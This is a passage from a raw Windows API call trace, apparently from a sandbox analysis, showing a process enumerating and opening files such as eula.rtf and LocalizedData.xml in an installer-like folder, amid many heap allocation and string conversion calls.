hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.038] AreFileApisANSI () returned 1 [0061.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041", lpUsedDefaultChar=0x0) returned 27 [0061.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.038] AreFileApisANSI () returned 1 [0061.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041") returned 27 [0061.038] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041" (normalized: "c:\\588bce7c90097ed212\\1041"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.038] GetLastError () returned 0x5 [0061.038] GetLastError () returned 0x5 [0061.038] SetLastError (dwErrCode=0x5) [0061.038] GetLastError () returned 0x5 [0061.038] SetLastError (dwErrCode=0x5) [0061.038] GetLastError () returned 0x5 [0061.038] SetLastError (dwErrCode=0x5) [0061.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.038] AreFileApisANSI () returned 1 [0061.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041") returned 27 [0061.039] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041" (normalized: "c:\\588bce7c90097ed212\\1041"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.039] GetLastError () returned 0x5 [0061.039] GetLastError () returned 0x5 [0061.039] SetLastError (dwErrCode=0x5) [0061.039] GetLastError () returned 0x5 [0061.039] SetLastError (dwErrCode=0x5) [0061.039] GetLastError () returned 0x5 [0061.039] SetLastError (dwErrCode=0x5) [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0061.039] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1042", cAlternateFileName="")) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.039] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.040] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.040] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0061.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0061.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.041] AreFileApisANSI () returned 1 [0061.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.041] AreFileApisANSI () returned 1 [0061.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0061.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0061.041] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.041] GetFileType (hFile=0x428) returned 0x1 [0061.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0061.041] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.042] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.042] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.042] CloseHandle (hObject=0x428) returned 1 [0061.042] AreFileApisANSI () returned 1 [0061.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0061.042] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.042] GetFileType (hFile=0x428) returned 0x1 [0061.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.042] CloseHandle (hObject=0x428) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.043] AreFileApisANSI () returned 1 [0061.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0061.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0061.043] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d)) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.044] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.045] AreFileApisANSI () returned 1 [0061.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 